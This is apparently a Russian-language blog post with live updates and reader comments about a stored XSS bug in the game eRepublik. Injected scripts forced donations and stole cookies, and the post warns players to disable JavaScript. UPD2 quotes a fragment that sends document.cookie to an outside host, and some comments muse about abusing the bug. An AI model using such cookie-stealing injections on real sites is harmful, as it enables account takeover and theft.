[UPD18 02:08] ВНИМАНИЕ! ОБНАРУЖЕН ОПАСНЫЙ БАГ!
Two-Four-Six-0-One
В наши руки попала запись как американцы донейтили голд Моредану.
Скрипты (кажется вродебы, а может и нет) отключили всех пострадавших разбанили, голд у них отобрали, пообщеали всем пострадавшим завтра голд вернуть.
UPD 17
0:46 Вроде всё, новые скрипты не появляются. Толи админы что-то в конституции поправили, толи атакующие выдохлись.
UPD 16
23:47
Ходят слухи о вылетах из американского конгресса. Народ делится скриптом для автодонейтов прямиком в комментариях. Кстати, он не совсем верный.
UPD 15
Всё, я сломался отслеживать. Пойду работать. Буду сообщать о самых важных событиях, а не по мелочи кто куда голд льет.
UPD 14
23:25 Забанен Дед хза донейты ему:
http://www.erepublik.com/en/citizen/donate/list/1425001
боргес - моредан - тихинен - дед - целеноправленно банят ФРП.
http://www.erepublik.com/en/citizen/profile/2027261 - отловлен в каментах Каро за скрипты.
http://www.erepublik.com/en/citizen/profile/1717871 - в коментариях к кексу ХАос донейтят сюда: http://www.erepublik.com/en/citizen/donate/list/1717709/1
Админы машут банхамером направо и налево.
UPD 13
22:53 http://www.erepublik.com/en/citizen/donate/list/1241400/1 - сейчас убивают Тихинена.
Заражена последняя статья родмиса и тем же акком статья кекса "меня уволили" .
Сообщает нам с полей борьбы с чумой Каро.
UPD 12
22:48 Статью родмиса продолжают атаковать:
http://www.erepublik.com/en/citizen/profile/1968701 - вот этот аккаунт.
Похоже это эпидемия - скриптами воруют куки и вставляют скрипты из сворованного аккаунта.
Ждем вируса, который будет заставлять аккаунты вставлять скрипты от себя в произвольные статьи.
DDM работает.
UPD 11
22:37 Каро нам сообщает:
Заражена последняя статья родмиса: http://www.erepublik.com/en/article/-1-979945/1/all
сюда кидает: http://www.erepublik.com/en/citizen/donate/list/1718173/1
http://www.erepublik.com/en/citizen/profile/1789376# - Человека, вставившего скрипт забанили.
На Моредана сыпятся донейты от британцев, еще один скрипт скорее всего в британских сми
UPD 10
22:20 Админы не вынесли творящегося ужаса и разбанили президента обратно.
UPD 9
22:00 Президент забанен MoredanKantose
Citizen permanently suspended for using system exploits.
Анархия в стране!
UPD 8
http://www.erepublik.com/en/citizen/donate/list/1507822/1
Друзья готовьтесь, скоро забанят нашего президента.
UPD 7 Забанили Borges16
В комментариях буржуйских статей я нашел скрипт от 1 левелного игрока, который донейтил боргу.
Я написл тикет:
Reported citizen: http://www.erepublik.com/en/citizen/profile/2026200
This person use for donating money to our FRP leader: http://www.erepublik.com/en/citizen/profile/1231360
Beware of banning Borges16, becouse this is sabotage and blackmailing:
http://www.erepublik.com/en/citizen/profile/1231360
Мне ответили:
Hello,
Thank you for the report, we have banned Borges16. We will forward the message on for further action.
Regards,
The eRepublik Team
UPD 6
Борисон забанен, но перед этим он успел выставить голд за рубли на валютном рынке по смехотворной цене 1 голд=12 рублей. В результате у нас скупили все рубли и началась паника на валютном рынке.
А рубли выведены из оборота - осели на забанненом аккаунте.
А те, у кого украли голд, его обрптно уже не получат - он выведен всем опдряд на валютный рынок.
У иностранцев откроется сегодня кирпичный комбинат.
UPD 5
Борисон, разместил скрипт в газете админов и выкрал шведскую казну в 3000 голдов:
http://www.erepublik.com/en/citizen/donate/list/2026143
У знатного шведа: http://www.erepublik.com/en/citizen/profile/5501
Так же борисон был замечен на манимаркете, когда выводил через него голд с аккаунта.
Сколько еще надо украсть у всех бабла, чтобы админы хоть немного почесались?
________
После переезда на новые сервера обнаружился опасный баг, который, казалось, вроде бы уже пофиксили - в тело статьи и в комментарии можно вставлять java-скрипты которые будут даже выполняться.
Пока только один человек поразвлекался по комментариям, вставив автоматический редирект на redtube.
Но вполне могут найтись желающие вставить редирект на нажатие кнопочки вылета из конгресса, голосования за статью, перевода денег кому надо и т.д. Все помнят, что было во времена Мартина Блюмена.
Так как админы у нас румынские.
Итак, ВНИМАНИЕ ВСЕМ!
НЕ НАЖИМАЙТЕ НА РЕКЛАМУ!
НЕ ЧИТАЙТЕ ГАЗЕТЫ ЗАЛОГИНЕНЫМИ или читайте с орги.
У кого фаерфокс - поставьте плагин NO и включите его.
В опере: Инструменты - Настройки - Дополнительно - Содержимое - снять галку с "Включить Жаваскрипт"
Тут можно проверить (стаптья кекса со встроенным скриптом) отключен у вас ява-скрипт или нет.
UPD Если вы такие наивные и думаете, что вас-то не поимеют, то можете посмотреть:
http://www2.erepublik.com/en/citizen/donate/list/1230646/1
Кто-то подгадил Каролине и вставил скрипт на донейт ей денег. Теперь она сидит и возвращает их.
UPD2 Найден в комментариях John McCainss http://www2.erepublik.com/en/citizen/profile/2025380
Который собирает ваши куки скриптом к себе на сайт: http://erep.000space.com/img.php?"+document.cookie
Куки при правлиьном хранении могут очень долго лежать. Готовьтесь, скоро украдут много- много аккаунтов.
UPD3
Теперь у нас есть http://www2.erepublik.com/en/citizen/profile/2025896
Выгребает все рубли с аккаунта и донейтит сюда: http://www2.erepublik.com/en/citizen/donate/list/2025781/1
Админы в тикетах признались что не знают что такое xss
UPD 4
Мне написал в ответ на тикет админ:
Hello Two-Four-Six-0-One,
I banned him, please tell everyone who donated because of his to write a ticket to me so i can solve the issue.
Have a nice day,
Stavros.
Так что катайте тикеты в службу багов, те, кто лишился своего бабла из-за скрипта.
Comments
Тоже заметил, 2 Статьи: приказ МО и кнопка показа всех комментов в статье Моредана про Западную Сибирь. Носкрипт стоял, включил, проблем больше нет.
Ну так намалявь тикет родминам
Даа.. веселые были времена.Не то что сейчас...
надо сделать скрин кто постит в комментах и репортить
Намалявил уже. Они походу бекап откатили - баг вернулся.
Ты думаешь они так быстро все поправят?
взял все запалил, а мы только начали думать как бы это использовать )))
Ну если интерестно, то постит вот этот:
http://www2.erepublik.com/en/citizen/profile/2024556" target="_blank">http://www2.erepublik.com/en/citizen/pro[..]4556
Он вчеа в конференции радовался что яваскрипты разрешены в коментах.
Репортить 1-левельного мульта, постящего с прокси редирект на красивые мокрые письки и сиськи?
Ироды.
быстро его...
на статье МО стоит высылка на редтуб
взял все запалил, а мы только начали думать как бы это использовать )))
А чо тут думать. Все делается легко и не принужденно. Даже думать не надо, все уже написано еще со времен прошлого бага. Вылеты из конгресса, продажа бабла игрока через мм кому надо по хорошему курсу.
@надо сделать скрин кто постит в комментах и репортить@
Там 1й уровень. Так что репорт ему не страшен. Пока хожу с выключеным яваскриптом, но рудмины такие рудмины, что даже голосование за статью, чтение последних новостей, смены валют, товаров, навыков в поиске работы итд у них только с яваскриптом, так что местами тяжко и приходиться включать)))
Ну из полезного применения - автовотанье статей в приказами))
ухожу в подполье
*logout*
В опере:
Инструменты-Настройк� �-Дополнительно-Содер� �имое - снять галку с "Включить Жаваскрипт"
Ну из полезного применения - автовотанье статей в приказами))
Ага, а так же засирание неугодных статей ссылкой на редтьюб. ОК.
Тоха, пасиб, добавил.
Ну дак как деревянные солдаты Урфен Джуса, медленно но верно...
"В опере: Инструменты - Настройки - Дополнительно - Содержимое - снять галку с "Включить Жаваскрипт""
не не
В опере правой кнопкой в настройки сайта и отключить скрипты только на нем
Ну тогда Ехплохер
Сервис -> Свойства -> Безопастность -> Другой там ищем тригер "Выполнять выполнять приложения ява"
Пасаны, а в Netscape Navigator 3.0 куда нажать?
ну в общем теперь мало кто будет голосовать за статьи - просто потому, что перед чтением новостей многие будут выключать JS, и включать его только после ухода из этого раздела
а смысл, без скриптов не работает ничего.
Первое проявление - коммент с оформлением (http://www2.erepublik.com/en/article/erepublik-1-977399/1/all) от некоего bar-boss. Там тоже использовалась вставка произвольного тега
В опере: f12 -- галку с javascript снять.
123
Без яваскрипта тоже никуда. Тут почти весь интерфейс на аяксе завязан, без альтернатив.
В ТОП!!!!
Убили журналитсику и троллинг, слоупоки скрип-киди. Все свалили из коментов.
Проверка...
Убили журналитсику и троллинг, слоупоки скрип-киди. Все свалили из коментов.
Ребят, у меня косяк тут. Сча зашёл повоевал иду хиляться. На станице региона показывает состояние моё на момент входа в игру( 90+ велнеса). Релоад и логаут не помогли. Чо делать?
отключение джавы от META не спасет 🙂
Касаемо первого
>>UPD Если вы такие наивные и думаете, что вас-то не поимеют, то можете посмотреть:
http://www2.erepublik.com/en/citizen/donate/list/1230646/1" target="_blank">http://www2.erepublik.com/en/citizen/don[..]46/1
Каролина где-то вставила скрипт на донейт ей денег.
Скрипт попался в статье "Мой симметричный ответ."
(http://www2.erepublik.com/en/article/-1-979474/1/20)
от пользователя "John McCainss" (viva EDEN!)
(Если жалко 10 копеек, то скрипты лучше выключить)
отключи скрипты и прощай еРеп+
ога ога.
BattalGazi
Gold 698.00
О_о обули парня
пишите админам чтоб в мейнтанс уходили, пока не поздно.
иначе они это еще долго не рагребут
Ну что там, пофиксили яву или нет?
нетЪ
@Админы в тикетах признались что не знают что такое xss@
И как в такие игры можно деньги еще вкладывать.
Вы еще думаете, что это я строю DDM? Да это админы своими руками мне помогают.
to Revult: в firefox'е с помощью NoScript можно также META отключить!
БОРИСОН ЖГИ ЕЩЕ!
эх Боря молодца)
Это был не боря а кто-то под него маскирующийся.
to UPD7
ахахаха
а румыны английский то знают? такое впечатление, что у них там шимпанзе сидит и нажимает большую красную кнопку как увидит в тикете ссылку на профиль.
@Это был не боря а кто-то под него маскирующийся.@
Пофигу, главное получен тройной профит:
1. Рубли проданы, голда упала на гос. орги.
2. Население получило дешевые голды в еще большем объеме.
3. Шведы лишились 3к+ голда
Мда. Они еще и читают через *опу. Кто блин делает так международные игры.
Бугага. Это можно занести в мемы.
> Beware of banning Borges16, becouse this is sabotage and blackmailing
>Thank you for the report, we have banned Borges16.
======================================== ====================
Это что-то!